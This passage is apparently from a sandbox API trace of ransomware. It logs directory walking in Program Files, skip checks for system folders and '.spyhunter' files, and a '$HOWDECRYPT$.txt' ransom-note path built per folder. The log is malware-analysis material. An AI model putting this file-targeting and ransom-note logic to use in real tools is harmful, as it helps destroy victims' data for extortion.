Files\\System\\msadc\\en-US\\..") returned 55 [0091.900] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.900] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.901] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.901] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="Windows") returned -1 [0091.901] lstrlenW (lpString="Windows") returned 7 [0091.901] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.901] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="System Volume Information") returned -1 [0091.901] lstrlenW (lpString="System Volume Information") returned 25 [0091.901] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 68 [0091.901] StrStrIW (lpFirst="msadcer.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.901] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.901] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 68 [0091.901] GetProcessHeap () returned 0x2c0000 [0091.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e3b0 [0091.901] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0091.901] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.901] lstrcmpiW (lpString1="msadcfr.dll.mui", lpString2="Windows") returned -1 [0091.901] lstrlenW (lpString="Windows") returned 7 [0091.901] lstrcmpiW (lpString1="msadcfr.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.901] lstrcmpiW (lpString1="msadcfr.dll.mui", lpString2="System Volume Information") returned -1 [0091.901] lstrlenW (lpString="System Volume Information") returned 25 [0091.901] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui") returned 68 [0091.901] StrStrIW (lpFirst="msadcfr.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.902] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.902] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui") returned 68 [0091.902] GetProcessHeap () returned 0x2c0000 [0091.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e488 [0091.902] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0091.902] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.902] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="Windows") returned -1 [0091.902] lstrlenW (lpString="Windows") returned 7 [0091.902] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.902] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.902] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="System Volume Information") returned -1 [0091.902] lstrlenW (lpString="System Volume Information") returned 25 [0091.902] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 68 [0091.902] StrStrIW (lpFirst="msadcor.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.902] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.902] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 68 [0091.902] GetProcessHeap () returned 0x2c0000 [0091.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e560 [0091.902] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0091.902] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.902] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="Windows") returned -1 [0091.902] lstrlenW (lpString="Windows") returned 7 [0091.903] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.903] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="System Volume Information") returned -1 [0091.903] lstrlenW (lpString="System Volume Information") returned 25 [0091.903] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 68 [0091.903] StrStrIW (lpFirst="msaddsr.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.903] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.903] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.903] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 68 [0091.903] GetProcessHeap () returned 0x2c0000 [0091.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e638 [0091.903] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0091.903] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.903] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="Windows") returned -1 [0091.903] lstrlenW (lpString="Windows") returned 7 [0091.903] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.903] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="System Volume Information") returned -1 [0091.903] lstrlenW (lpString="System Volume Information") returned 25 [0091.903] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 69 [0091.903] StrStrIW (lpFirst="msdaprsr.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.903] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.903] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.903] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 69 [0091.903] GetProcessHeap () returned 0x2c0000 [0091.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e710 [0091.904] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0091.904] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.904] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="Windows") returned -1 [0091.904] lstrlenW (lpString="Windows") returned 7 [0091.904] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.904] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="System Volume Information") returned -1 [0091.904] lstrlenW (lpString="System Volume Information") returned 25 [0091.904] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 69 [0091.904] StrStrIW (lpFirst="msdaremr.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.904] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.904] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.904] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 69 [0091.904] GetProcessHeap () returned 0x2c0000 [0091.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e7e8 [0091.904] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0091.904] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.905] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.906] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\$HOWDECRYPT$.txt") returned 69 [0091.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\$HOWDECRYPT$.txt") returned 69 [0091.906] GetProcessHeap () returned 0x2c0000 [0091.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e8c0 [0091.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0091.906] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.906] lstrcmpiW (lpString1="handler.reg", lpString2="Windows") returned -1 [0091.906] lstrlenW (lpString="Windows") returned 7 [0091.906] lstrcmpiW (lpString1="handler.reg", lpString2="$Recycle.bin") returned 1 [0091.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.906] lstrcmpiW (lpString1="handler.reg", lpString2="System Volume Information") returned -1 [0091.906] lstrlenW (lpString="System Volume Information") returned 25 [0091.907] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned 58 [0091.907] StrStrIW (lpFirst="handler.reg", lpSrch=".spyhunter") returned 0x0 [0091.907] lstrcmpW (lpString1="handler.reg", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.907] lstrcmpW (lpString1="handler.reg", lpString2="_uninstalling_.png") returned 1 [0091.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned 58 [0091.907] GetProcessHeap () returned 0x2c0000 [0091.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34d058 [0091.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0091.907] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.907] lstrcmpiW (lpString1="handsafe.reg", lpString2="Windows") returned -1 [0091.907] lstrlenW (lpString="Windows") returned 7 [0091.907] lstrcmpiW (lpString1="handsafe.reg", lpString2="$Recycle.bin") returned 1 [0091.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.907] lstrcmpiW (lpString1="handsafe.reg", lpString2="System Volume Information") returned -1 [0091.907] lstrlenW (lpString="System Volume Information") returned 25 [0091.907] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned 59 [0091.907] StrStrIW (lpFirst="handsafe.reg", lpSrch=".spyhunter") returned 0x0 [0091.907] lstrcmpW (lpString1="handsafe.reg", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.907] lstrcmpW (lpString1="handsafe.reg", lpString2="_uninstalling_.png") returned 1 [0091.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned 59 [0091.907] GetProcessHeap () returned 0x2c0000 [0091.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34c8d8 [0091.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0091.908] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.908] lstrcmpiW (lpString1="msadce.dll", lpString2="Windows") returned -1 [0091.908] lstrlenW (lpString="Windows") returned 7 [0091.908] lstrcmpiW (lpString1="msadce.dll", lpString2="$Recycle.bin") returned 1 [0091.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.908] lstrcmpiW (lpString1="msadce.dll", lpString2="System Volume Information") returned -1 [0091.908] lstrlenW (lpString="System Volume Information") returned 25 [0091.908] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 57 [0091.908] StrStrIW (lpFirst="msadce.dll", lpSrch=".spyhunter") returned 0x0 [0091.908] lstrcmpW (lpString1="msadce.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.908] lstrcmpW (lpString1="msadce.dll", lpString2="_uninstalling_.png") returned 1 [0091.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 57 [0091.908] GetProcessHeap () returned 0x2c0000 [0091.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34c998 [0091.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0091.908] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.908] lstrcmpiW (lpString1="msadcer.dll", lpString2="Windows") returned -1 [0091.908] lstrlenW (lpString="Windows") returned 7 [0091.908] lstrcmpiW (lpString1="msadcer.dll", lpString2="$Recycle.bin") returned 1 [0091.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.908] lstrcmpiW (lpString1="msadcer.dll", lpString2="System Volume Information") returned -1 [0091.908] lstrlenW (lpString="System Volume Information") returned 25 [0091.908] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 58 [0091.908] StrStrIW (lpFirst="msadcer.dll", lpSrch=".spyhunter") returned 0x0 [0091.909] lstrcmpW (lpString1="msadcer.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.909] lstrcmpW (lpString1="msadcer.dll", lpString2="_uninstalling_.png") returned 1 [0091.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 58 [0091.909] GetProcessHeap () returned 0x2c0000 [0091.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34ca58 [0091.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0091.909] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.909] lstrcmpiW (lpString1="msadcf.dll", lpString2="Windows") returned -1 [0091.909] lstrlenW (lpString="Windows") returned 7 [0091.909] lstrcmpiW (lpString1="msadcf.dll", lpString2="$Recycle.bin") returned 1 [0091.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.909] lstrcmpiW (lpString1="msadcf.dll", lpString2="System Volume Information") returned -1 [0091.909] lstrlenW (lpString="System Volume Information") returned 25 [0091.909] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned 57 [0091.909] StrStrIW (lpFirst="msadcf.dll", lpSrch=".spyhunter") returned 0x0 [0091.909] lstrcmpW (lpString1="msadcf.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.909] lstrcmpW (lpString1="msadcf.dll", lpString2="_uninstalling_.png") returned 1 [0091.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned 57 [0091.909] GetProcessHeap () returned 0x2c0000 [0091.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cf98 [0091.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0091.909] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.909] lstrcmpiW (lpString1="msadcfr.dll", lpString2="Windows") returned -1 [0091.910] lstrlenW (lpString="Windows") returned 7 [0091.910] lstrcmpiW (lpString1="msadcfr.dll", lpString2="$Recycle.bin") returned 1 [0091.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.910] lstrcmpiW (lpString1="msadcfr.dll", lpString2="System Volume Information") returned -1 [0091.910] lstrlenW (lpString="System Volume Information") returned 25 [0091.910] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned 58 [0091.910] StrStrIW (lpFirst="msadcfr.dll", lpSrch=".spyhunter") returned 0x0 [0091.910] lstrcmpW (lpString1="msadcfr.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.910] lstrcmpW (lpString1="msadcfr.dll", lpString2="_uninstalling_.png") returned 1 [0091.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned 58 [0091.910] GetProcessHeap () returned 0x2c0000 [0091.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34cb18 [0091.910] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0091.910] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.910] lstrcmpiW (lpString1="msadco.dll", lpString2="Windows") returned -1 [0091.910] lstrlenW (lpString="Windows") returned 7 [0091.910] lstrcmpiW (lpString1="msadco.dll", lpString2="$Recycle.bin") returned 1 [0091.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.910] lstrcmpiW (lpString1="msadco.dll", lpString2="System Volume Information") returned -1 [0091.910] lstrlenW (lpString="System Volume Information") returned 25 [0091.910] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 57 [0091.910] StrStrIW (lpFirst="msadco.dll", lpSrch=".spyhunter") returned 0x0 [0091.910] lstrcmpW (lpString1="msadco.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.910] lstrcmpW (lpString1="msadco.dll", lpString2="_uninstalling_.png") returned 1 [0091.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 57 [0091.911] GetProcessHeap () returned 0x2c0000 [0091.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cbd8 [0091.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0091.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.911] lstrcmpiW (lpString1="msadcor.dll", lpString2="Windows") returned -1 [0091.911] lstrlenW (lpString="Windows") returned 7 [0091.911] lstrcmpiW (lpString1="msadcor.dll", lpString2="$Recycle.bin") returned 1 [0091.911] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.911] lstrcmpiW (lpString1="msadcor.dll", lpString2="System Volume Information") returned -1 [0091.911] lstrlenW (lpString="System Volume Information") returned 25 [0091.911] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 58 [0091.911] StrStrIW (lpFirst="msadcor.dll", lpSrch=".spyhunter") returned 0x0 [0091.911] lstrcmpW (lpString1="msadcor.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.911] lstrcmpW (lpString1="msadcor.dll", lpString2="_uninstalling_.png") returned 1 [0091.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 58 [0091.911] GetProcessHeap () returned 0x2c0000 [0091.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34cc98 [0091.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0091.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.911] lstrcmpiW (lpString1="msadcs.dll", lpString2="Windows") returned -1 [0091.911] lstrlenW (lpString="Windows") returned 7 [0091.911] lstrcmpiW (lpString1="msadcs.dll", lpString2="$Recycle.bin") returned 1 [0091.911] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.912] lstrcmpiW (lpString1="msadcs.dll", lpString2="System Volume Information") returned -1 [0091.912] lstrlenW (lpString="System Volume Information") returned 25 [0091.912] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned 57 [0091.912] StrStrIW (lpFirst="msadcs.dll", lpSrch=".spyhunter") returned 0x0 [0091.912] lstrcmpW (lpString1="msadcs.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.912] lstrcmpW (lpString1="msadcs.dll", lpString2="_uninstalling_.png") returned 1 [0091.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned 57 [0091.912] GetProcessHeap () returned 0x2c0000 [0091.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cd58 [0091.912] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0091.912] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.912] lstrcmpiW (lpString1="msadds.dll", lpString2="Windows") returned -1 [0091.912] lstrlenW (lpString="Windows") returned 7 [0091.912] lstrcmpiW (lpString1="msadds.dll", lpString2="$Recycle.bin") returned 1 [0091.912] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.912] lstrcmpiW (lpString1="msadds.dll", lpString2="System Volume Information") returned -1 [0091.912] lstrlenW (lpString="System Volume Information") returned 25 [0091.912] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 57 [0091.912] StrStrIW (lpFirst="msadds.dll", lpSrch=".spyhunter") returned 0x0 [0091.912] lstrcmpW (lpString1="msadds.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.912] lstrcmpW (lpString1="msadds.dll", lpString2="_uninstalling_.png") returned 1 [0091.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 57 [0091.913] GetProcessHeap () returned 0x2c0000 [0091.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34ce18 [0091.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0091.913] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.913] lstrcmpiW (lpString1="msaddsr.dll", lpString2="Windows") returned -1 [0091.913] lstrlenW (lpString="Windows") returned 7 [0091.913] lstrcmpiW (lpString1="msaddsr.dll", lpString2="$Recycle.bin") returned 1 [0091.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.913] lstrcmpiW (lpString1="msaddsr.dll", lpString2="System Volume Information") returned -1 [0091.913] lstrlenW (lpString="System Volume Information") returned 25 [0091.913] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 58 [0091.913] StrStrIW (lpFirst="msaddsr.dll", lpSrch=".spyhunter") returned 0x0 [0091.913] lstrcmpW (lpString1="msaddsr.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.913] lstrcmpW (lpString1="msaddsr.dll", lpString2="_uninstalling_.png") returned 1 [0091.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 58 [0091.913] GetProcessHeap () returned 0x2c0000 [0091.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34ced8 [0091.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0091.913] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.913] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="Windows") returned -1 [0091.913] lstrlenW (lpString="Windows") returned 7 [0091.913] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="$Recycle.bin") returned 1 [0091.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.914] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="System Volume Information") returned -1 [0091.914] lstrlenW (lpString="System Volume Information") returned 25 [0091.914] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 59 [0091.914] StrStrIW (lpFirst="msdaprsr.dll", lpSrch=".spyhunter") returned 0x0 [0091.914] lstrcmpW (lpString1="msdaprsr.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.914] lstrcmpW (lpString1="msdaprsr.dll", lpString2="_uninstalling_.png") returned 1 [0091.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 59 [0091.914] GetProcessHeap () returned 0x2c0000 [0091.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d358 [0091.914] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0091.914] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.914] lstrcmpiW (lpString1="msdaprst.dll", lpString2="Windows") returned -1 [0091.914] lstrlenW (lpString="Windows") returned 7 [0091.914] lstrcmpiW (lpString1="msdaprst.dll", lpString2="$Recycle.bin") returned 1 [0091.914] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.914] lstrcmpiW (lpString1="msdaprst.dll", lpString2="System Volume Information") returned -1 [0091.914] lstrlenW (lpString="System Volume Information") returned 25 [0091.914] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 59 [0091.914] StrStrIW (lpFirst="msdaprst.dll", lpSrch=".spyhunter") returned 0x0 [0091.914] lstrcmpW (lpString1="msdaprst.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.914] lstrcmpW (lpString1="msdaprst.dll", lpString2="_uninstalling_.png") returned 1 [0091.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 59 [0091.914] GetProcessHeap () returned 0x2c0000 [0091.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d298 [0091.915] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0091.915] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: 